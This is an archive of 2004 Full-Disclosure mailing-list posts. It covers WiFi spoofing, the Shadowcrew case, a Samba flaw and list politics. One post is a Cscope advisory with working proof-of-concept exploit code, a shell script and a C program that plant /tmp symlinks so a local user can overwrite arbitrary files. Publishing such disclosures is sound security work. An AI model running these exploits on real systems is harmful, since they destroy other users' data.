10.0/RPMS/apache2-mod_dav-2.0.48-6.8.100mdk.i586.rpm e10251cb9284c3608246562436dbb810 10.0/RPMS/apache2-mod_deflate-2.0.48-6.8.100mdk.i586.rpm bbafb2da31fc4f74e0f50daf3837e980 10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.8.100mdk.i586.rpm b4e0fc5f44800be9f533f49b02df98d1 10.0/RPMS/apache2-mod_file_cache-2.0.48-6.8.100mdk.i586.rpm 165ea1b87ebdcb354104119151ef3224 10.0/RPMS/apache2-mod_ldap-2.0.48-6.8.100mdk.i586.rpm d520e26d61f087fa1fb5a883bc91b55a 10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.8.100mdk.i586.rpm fcd79d7f5311613a55bc7d93a3065bb7 10.0/RPMS/apache2-mod_proxy-2.0.48-6.8.100mdk.i586.rpm 93b11dfa47fd2f50be4aa031ce5e5d31 10.0/RPMS/apache2-mod_ssl-2.0.48-6.8.100mdk.i586.rpm 2a5b02bf2b63f56912939f1fd9c690c9 10.0/RPMS/apache2-modules-2.0.48-6.8.100mdk.i586.rpm d05928f34f67f97d5299933147005c80 10.0/RPMS/apache2-source-2.0.48-6.8.100mdk.i586.rpm 658a009f02e56daf3ae70ab8eec58da4 10.0/RPMS/libapr0-2.0.48-6.8.100mdk.i586.rpm 8de7f690532038f5efd72c8527d38c4d 10.0/SRPMS/apache2-2.0.48-6.8.100mdk.src.rpm Mandrakelinux 10.0/AMD64: e7804f074b0dc2801990fc0aef753e54 amd64/10.0/RPMS/apache2-2.0.48-6.8.100mdk.amd64.rpm c80dba0761efacb3798021b22de8ec2b amd64/10.0/RPMS/apache2-common-2.0.48-6.8.100mdk.amd64.rpm 2a14dfc90d7e4dbbe3ec346608996211 amd64/10.0/RPMS/apache2-devel-2.0.48-6.8.100mdk.amd64.rpm 85755952a6b394088e1951b7156fb2ca amd64/10.0/RPMS/apache2-manual-2.0.48-6.8.100mdk.amd64.rpm 4ff901cbf27d7c931f5b0a66a89cd994 amd64/10.0/RPMS/apache2-mod_cache-2.0.48-6.8.100mdk.amd64.rpm 9ec303b8c3b4c35be1ff7c0fce9d3792 amd64/10.0/RPMS/apache2-mod_dav-2.0.48-6.8.100mdk.amd64.rpm 6fe45b12fc46724d194bebba4b2f6204 amd64/10.0/RPMS/apache2-mod_deflate-2.0.48-6.8.100mdk.amd64.rpm b62d04892bfc7a13aa871c7756069ec5 amd64/10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.8.100mdk.amd64.rpm ca66b434e16a47350fdb8705874e8f4b amd64/10.0/RPMS/apache2-mod_file_cache-2.0.48-6.8.100mdk.amd64.rpm 684c7bc97456a5c2253883254766561f amd64/10.0/RPMS/apache2-mod_ldap-2.0.48-6.8.100mdk.amd64.rpm 3b7bf8878063d12e0ad475cdb79f3102 amd64/10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.8.100mdk.amd64.rpm 116fd17e52822ab212399eb5cdc1f664 amd64/10.0/RPMS/apache2-mod_proxy-2.0.48-6.8.100mdk.amd64.rpm a0e901e05ec786161ab047c2392318dd amd64/10.0/RPMS/apache2-mod_ssl-2.0.48-6.8.100mdk.amd64.rpm 5beaaaf7d348acfd0fb2f78a06982798 amd64/10.0/RPMS/apache2-modules-2.0.48-6.8.100mdk.amd64.rpm 2613e81648633bbbc10f884f1abadb72 amd64/10.0/RPMS/apache2-source-2.0.48-6.8.100mdk.amd64.rpm 457c1e2e15d1928c4a21448d3a61eb79 amd64/10.0/RPMS/lib64apr0-2.0.48-6.8.100mdk.amd64.rpm 8de7f690532038f5efd72c8527d38c4d amd64/10.0/SRPMS/apache2-2.0.48-6.8.100mdk.src.rpm Mandrakelinux 10.1: 16039f8491bf2fbdd238978e6363d2a9 10.1/RPMS/apache2-2.0.50-7.2.101mdk.i586.rpm 4d6b79af111ab3dafd8329c7bd67fc14 10.1/RPMS/apache2-common-2.0.50-7.2.101mdk.i586.rpm 8dea7dc4b57de4f20bd355c93253473b 10.1/RPMS/apache2-devel-2.0.50-7.2.101mdk.i586.rpm 011decc40287db6e6a379cb341c59919 10.1/RPMS/apache2-manual-2.0.50-7.2.101mdk.i586.rpm e1e52e7fb5f230e4048933e564b323ed 10.1/RPMS/apache2-mod_cache-2.0.50-7.2.101mdk.i586.rpm 958306ad451ffc8421cc3efa8c659de0 10.1/RPMS/apache2-mod_dav-2.0.50-7.2.101mdk.i586.rpm d0863e950273d41fd57a4fa64f18eb7e
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004, n3td3v wrote: ... If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tollerence with online crime. Govs should have the authority to close anything done because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, its time to get a tighter grip on things. ... Same for zone-h.org, close the crap down.. f**k anything that looks remotely hax0rish. Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that quaint (I believe that's what our new Attorney general calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xmlsSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights. Zero tollerence. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Well MS isn't about to produce code to configure MAC's and other OSs, wouldn't you say that makes sense? They certainly aren't the experts in writing code for controlling those platforms and I don't see why they would want to. On the flip side there are other companies doing so. Take a look at companies like Centrify and Vintela and what they are doing for *nix / *bsd platforms and integration into Active Directory specifically for SECURE authentication/authorization and policy management in a corporate environment. So once your favorite Solaris box can be configured via AD policies, does it make it an ms toy as well? joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of stephane nasdrovisky Sent: Tuesday, November 16, 2004 8:39 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Unfortunatly, ms group policy do not handle mac, solaris, linux, ... only ms toys can be configured using this. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
this stuff is totally real to the max. my cousin's former roomate's neighbor's uncle jessie once worked for the secret service and he told me it's completely standard protocol to have the mission impossible theme in the background. also the strike tag is used exclusively by the secret service. From: Curt Purdy [EMAIL PROTECTED] To: 'Insecure' [EMAIL PROTECTED], 'Danny' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service? Date: Wed, 17 Nov 2004 04:23:52 -0600 Danny wrote: The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Insecure replied: Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies. Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it. Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA Information Security Engineer DP Solutions - If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- former White House cybersecurity zar Richard Clarke ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons?
-Original Message- From: Jason Coombs [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 16, 2004 12:09 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Airport x-ray software creating images of phantom weapons? My flight into Midway airport, Chicago, just sat on the runway for nearly two hours tonight because of a potential security breach in the terminal, described here: http://www.nbc5.com/news/3921217/detail.html?z=dpdpswid=22659 94dppid=65194 A Transportation Security Administration representative at Midway airport confirmed for me that the suspicious object displayed on the computerized x-ray machine may have been a phantom image similar to the one in Miami on November 13th: Software glitch in security scanner at Miami airport 'projected the image of a weapon' that didn't exist http://abclocal.go.com/ktrk/news/nat_world/111304_APnat_airport.html OK, let's stop here for a moment. Before we get to the digitizing of pictures, let's look at something here. According to the story, the man's bag had the image of a grenade in it. Yet, he was able to move away from the screening area, sit down at a set of seats _with_ his bag, then move away from there to the food courts with a friend all without being stopped, watched, tailed, or any other security measures taken regarding him. During this time, the security forces protecting the airport are informed of the potential threat, start their sweeps and find the gentleman in the food court. Let me ask a couple questions, having spent many years as a soldier, that bother me to the extreme regarding this situation. - WHY was this man allowed out of the screening area in the first place? - WHY was there no security force on either side of the mouth of the opening out of the security checkpoint? - WHY was the security force not immediately alerted to the potential threat BEFORE the man left the checkpoint? - WHY was this man allowed to move to a set of seats _having passed the security checks_ where this supposed 'ghost image' was seen? - WHY was this man then allowed to roam freely _within_ the airport to the food court? - WHY did the security forces NOT have a monitoring device or similar human presence watching this man? Notice nothing of what I have said touches on the electronic technologies used to examine baggage, personnel, or passengers, such as what caused this apparent ghost image. This is purely monitoring, notification, response, and crisis management that I'm speaking of. We have numerous holes within the security protocols at this airport that this man slipped through without even touching on the original gist of this thread. Add on the complaints Jason brought up and we have a much larger security issue in this country than most people suspect. Is it cause for panic? Hardly. Is it cause for a very serious review and a VERY firm set of response policies created? Yes, definitely. Just my 2 cents. :-) -- David D.W. Downey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WiFi question
A very good point indeed Mark; one that shouldn't be dismissed even WITH common SSIDs. Other technology clashing with WiFi certainly isn't new... in fact it getting worse! Besides motion sensors, also look for wireless phones, security systems (like ADT's window/door systems - they use wireless to communicate with some systems), things like that. With the amount of wireless technology out there, it's becoming less and less common to find unaffected WiFi. -- Peace. ~G On Wed, 17 Nov 2004 12:41:44 -0500, Lachniet, Mark [EMAIL PROTECTED] wrote: Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240mhz range, which has resonance at 2.4ghz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have though it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it. Mark Lachniet -Original Message- From: KF_lists [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 10:21 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question fake ap http://bsdvault.net/bsdfap.txt http://www.blackalchemy.to/project/fakeap/ -KF [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
| REXOTEC(dot)COM ### | |=-=[ ADV RX171104 - Cscope :: Race condition on temporary file ]-=| | | |=---[ - INFORMATION `--| VulnDiscovery: 2003/05/21 Release Date : 2004/11/17 Author : Gangstuck / Psirac [EMAIL PROTECTED] Application : Cscope Affected : All version (last one is cscope-15.5) Platforms: Linux, SCO, SunOS/Solaris, ... Risk : Critical Severity : Allow local user to compromise filesystem. Vendor : http://cscope.sourceforge.net/ Reference: http://www.rexotec.com/advisory/RX171104.html Status : vendor has just been notified. |=---[ - SUMMARY OVERVIEW `--| Cscope is a developper's tool under the BSD license used to browse source code. His Unix pedigree is impeccable and has originally been developped at Bell Labs back in PDP-11's days. Cscope was a part of the official ATT Unix distribution for many years and has been used to manage projects involving 20 million lines of code ! |=---[ - VULNERABILITY OVERVIEW `--| First, the temporary directory (P_tmpdir=/tmp) is badly handled in every myfopen() internal call. As all we know, creation of predictable temporary file allows any local attacker to remove arbitrary files on the vulnerable file system via the infamous symlink vulnerability. /src/main.c : --; [...] chartemp1 [PATHLEN + 1]; /* temporary file name */ chartemp2 [PATHLEN + 1]; /* temporary file name */ [...] tmpdir = mygetenv(TMPDIR, TMPDIR); [...] /* create the temporary file names */ pid = getpid(); (void) sprintf(temp1, %s/cscope%d.1, tmpdir, pid); (void) sprintf(temp2, %s/cscope%d.2, tmpdir, pid); [...] Before us are the computing of two predictable files names (resulting in a schema like /tmp/cscopeNEXTPID.numba). So, we just have to probe the pid numba and make the same template which to be used for temporary file creation. Then, cscope handle the files with wrong set of flags and compromise root filesystem due to symlink vulnerability. |=---[ - EXPLOITS - Proof of concept `--| ---88---cut-here---88--- #!/bin/sh # # RXcscope_proof.sh # brute force case baby # cscope advisory and exploit by Gangstuck / Psirac [EMAIL PROTECTED] # HOWM=30 CURR=`ps | grep ps | awk '{print $1}'` NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1` LAST=`expr $NEXT + $HOWM` echo -e \n--= Cscope Symlink Vulnerability Exploitation =--\n\ [versions 15.5 and minor]\n\ Gangstuck / Psirac\n\ [EMAIL PROTECTED]\n\n if [ $# -lt 1 ]; then echo Usage: $0 file1 [number_of_guesses] exit 1 fi rm -f /tmp/cscope* echo Probed next process id [${NEXT}] while [ ! $NEXT -eq $LAST ]; do ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1` ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1` done ---88---cut-here---8-8--- /* RXcscope exploit version 15.5 and minor */ #include stdio.h #include stdlib.h #include sys/types.h #include unistd.h #define BSIZE 64 int main(int ac, char *av[]) { pid_t cur; u_int i=0, lst; char buffer[BSIZE + 1]; fprintf(stdout, \n --[ Cscope Exploit ]--\n\ version 15.5 and minor \n \ Gangstuck / Psirac\n \ [EMAIL PROTECTED]\n\n); if (ac != 3) { fprintf(stderr, Usage: %s target max file creation\n, av[0]); return 1; } cur=getpid(); lst=cur+atoi(av[2]); fprintf(stdout, - Current process id is . [%5d]\n \ - Last process id is [%5d]\n, cur, lst); while (++cur != lst) { snprintf(buffer, BSIZE, %s/cscope%d.%d, P_tmpdir, cur, (i==2) ? --i : ++i); symlink(av[1], buffer); } return 0; } ---8--8---cut-here---8-8--- |=---[ - PATCH
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 10:21:01 -0800, josh abbott [EMAIL PROTECTED] wrote: this stuff is totally real to the max. my cousin's former roomate's neighbor's uncle jessie once worked for the secret service and he told me it's completely standard protocol to have the mission impossible theme in the background. also the strike tag is used exclusively by the secret service. The strike tag is used on microsoft frontpage editor, which the secret service used for shadowcrew.com, and every other microsoft frontpage user across the world will use the strike tag when using microsoft frontpage editor, so I don't know what you mean when you use the word exclusively used by secret services. Thanks,n3td3v http://www.geocities.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 11:41:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Well, it is given that posting to FD does give a site exposure (good and bad). But I wouldn't say that FD was the cause of it..it was the illegal activity that was the cause of it. We all know SCC does some underground stuff and they post here each time they move. So...I wouldn't blame the FD list for anything. I wouldn't use the word blame? I think its a good thing if Full-Disclosure is helping to catch online criminals. I don't know if you like malicious hackers and other criminals, but yeah I dislike them. I would do anything in my power to stop online crime, from scriptkiddie stuff, to sex stuff,spam,scams, fraud, terrorism and back again. I have no space for anyone thinking they are elite and all the other hacker scene crap. Its time to clamp down on the BS thats on the net. If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tollerence with online crime. Govs should have the authority to close anything done because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, its time to get a tighter grip on things. Thanks,n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Administrivia: Fool Disclosure
On Mon, 15 Nov 2004 13:46:37 CST, Frank Knobbe said: Which leads to the question, which is a safe graphics file format? BMP perhaps? Nope - the incredible compression of .BMP files allows its use to DoS the mail server. :) pgpbsc2Iv5LYR.pgp Description: PGP signature
Re: [Full-Disclosure] OT: U.S. 2004 Election Fraud.
On Mon, 15 Nov 2004 22:32:21 +0100, Florian Streck said: Wasn't the reason for the Electors that at that time it was not practicable to make a direct election due to the great distances in America? No, the concern was that people out in the boonies might be ignorant hicks who would vote for a bad choice because they didn't have much exposure to either candidate's viewpoints. So they added the Electoral College as a safety net (presuming that the actual electors would have more information about all the candidates...) Now can we get back to *security* issues, like Is a Diebold hackable by a chimpanzee? :) (Personally, I'm convinced that there *was* fraud on *both* sides, but not enough to actually *provably* sway the end result for President, so we need to move on and start thinking about how to make 2008 a *tough* election to hack - and *that* discussion *is* on topic here.. ;) pgpaA4G8jrdrn.pgp Description: PGP signature
[Full-Disclosure] For your pleasure
Guys, For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php I know, it is in French, but here is my translation, it deserves to be known. Digging into Windows XP Operating Systems, the journalists of PC Welt discovered the following text at the end of the files presents into the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory: [see the picture at the link] You have to know that DeepzOne is the nickname of a founding member of the Radium cracking group created in 1997 and especialized into the craking of sound oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the SoundForce program. Even if it is probable the Redmond giant has a license of this program (400$), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy... Laurent LEVIER Systems Networks Security Expert, CISSP CISM ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 13:29:19 -0700 (MST), Bruce Ediger [EMAIL PROTECTED] wrote: Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that quaint (I believe that's what our new Attorney general calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xmlsSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights. Zero tollerence. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans. I don't live in the U.S thankfully, I live in a sane country called the U.K Would you agree with closing down a site that was letting child abusers to post links to illegal child porn photographs? Would the site owner be able to say, we aren't involved with any of these links, we just provide the site for the criminals to do it, so other child abusers can get links easy to child porn photos. But no, when we move onto online malicious hacker crimes, its ok for sites, such as zone-h, which allows malicious hackers to post links for other hackers to get a kick over, just like a child abuser would by visiting a child porn photo. Imagine a child abuse site which also kept a score board of the biggest amount of child porn photo posters. Yet again we move onto malicious hacker online crimes, it seems to be different for zone-h to keep scores of the biggest malicious hacker defacement posters. Why one rule for one online crime promotion site and not the same rule for another online crime promotion site? I guess you would allow a child porn promotion site, like you think its ok for zone-h to be online promoting online malicious hacking and not closed down. Thanks,n3td3v http://www.geocities.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Eudora 6.2 attachment spoof
On Mon, 29 Nov 2004 05:31:14 EST, KF_lists said: Professional responses like that *really* make me wanna go out and pay for Eudora. OK. So make a difference. How much *more* are you willing to pay for Eudora to make security a higher priority? Yes, we security geeks all have a vested interest in whether Qualcomm fixes the security holes *totally* - the white hats want them fixed, the black hats don't. But we mustn't lose sight of the fact that at the end of the month, Qualcomm probably doesn't manage to pay a *single* programmer's salary out of the income they get from selling highly secure Eudora - but they probably manage to pay several programmers if they can advertise Now with *better* spam filtering!! As a result, spam filtering that impacts 95% of the user base gets more programmer time/eyeballs than fixing some truly convoluted corner case in the MIME handling that maybe gets used on 0.01% of the users, if that many. Remember - software-for-money is a *business*, and decisions about priorities will almost always be made based on the *business model*, not some moral imperative, because you pay your expenses with sales income, not moral imperatives. pgp7GJeVYjs0Y.pgp Description: PGP signature
RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
I have no problem with this list. I use a tool to passively filter this list the same that I do for the spam problem that has taken over planet earth In your email client there is a button that will take care of this for you. Look for something in the respects of DELETE Anyone who can not decipher what is good and what is bad should be unsubscribed instead. Mike -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Esler, Joel - Contractor Sent: Wednesday, November 17, 2004 9:06 AM To: Jason; Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] question regarding CAN-2004-0930
--On Wednesday, November 17, 2004 12:13:52 AM +0100 Christian [EMAIL PROTECTED] wrote: hm, i still don't get it: the daemon has to answer to dir too, doesn't he? the sole reason that ls is a unix utility does not make sense in this context. ls and dir are not vulnerable here, sure, but this still does not explain why smbd acts different here. i've played around with tcpdump and strace here. the tcpdump looks very similiar, the smbd's answer to ls is much shorter, as strace reveals. I've obviously done a poor job of explaining the problem then. When you do a dir, you are making a call that the daemon has to respond to. The daemon is vulnerable, so when you make a dir request with the specific parameters that overflow the buffer in the daemon, it crashes. When you do an ls, you are making a call that the *os* has to respond to. The os is *not* vulnerable, so it (properly) rejects the request as malformed. Hopefully that makes more sense to you. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
If you want to do Kismet, get a Sharp Zaurus handheld and install OpenZaurus. Been running Dsniff, Kismet and Nmap on my handheld. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave King Sent: Wednesday, November 17, 2004 10:52 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question As far as handheld devices to aid you in your quest go, there are several options. If you've got a Pocket PC around you can try ministumbler, which is basically the Pocket PC version of netstumbler. It's free and would probably do most of what you want. If you want more and you're willing to fork out some cash (I believe it's around $3000) AirMagnet can do some really cool stuff but it's probably overkill for you. If you're feeling brave and can get a hold of an Ipaq you can replace Windows with Familiar Linux (www.handhelds.org) and then install Kismet (www.kismetwireless.net) which is a great free WiFi detecting/sniffing utility. Kismet can even work with a gps reciever and triangulate the location of the access point (although gps systems don't tend to work well in buildings). This option is what I use since I could run it on an Ipaq I picked up off Ebay cheap and has all the features I need, plus it's free. Laters, Dave King http://www.thesecure.net [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. * ** *** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. * ** *** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] question regarding CAN-2004-0930
On Wed, 17 Nov 2004 17:49:12 -0600, Paul Schmehl wrote When you do an ls, you are making a call that the *os* has to respond to. The os is *not* vulnerable, so it (properly) rejects the request as malformed. i think i get it now. as someone else explained is wildcard expansion also an issue here. so the (linux) os responds, before the smbd could even notice the call. Hopefully that makes more sense to you. yes, thank you. Christian. -- BOFH excuse #433: error: one bad user found in front of screen ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: New whitepaper: Writing IA32 Restricted Instruction Set Shellcode Decoder Loops
Hey, cool paper. Speaking of phrack, if in the future you have an article you think is print-worthy but is rejected by most zines, try sending it to Binary Revolution [EMAIL PROTECTED]. Although they're newer and have had some delays in getting new issues out, they're starting to re-focus on the magazine and the number of their supporters is growing. Sorry if this comes off a little advertisey, but hopefully if more people write in then BinRev can publish more original articles about vulnerabilities which can then make it back onto the web as sample articles. Berend-Jan Wever wrote: Hi all, This one got rejected by phrack and I couldn't be arsed to rewrite it so it would make the next edition: Writing IA32 Restricted Instruction Set Shellcode Decoder Loops by SkyLined ( http://www.edup.tudelft.nl/~bjwever/whitepaper_shellcode.html ) The article addresses the requirements for writing a shellcode decoder loop using a limited number of characters that limits our instruction set. Most of it is based on my experience with alphanumeric decoders but the principles apply to any piece of code that is written to work with a limited instruction set. (It's a continuation on rix's and obscou's work for phrack). Comments and questions welcome, but I can not guarantee an answer to n00b questions. Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
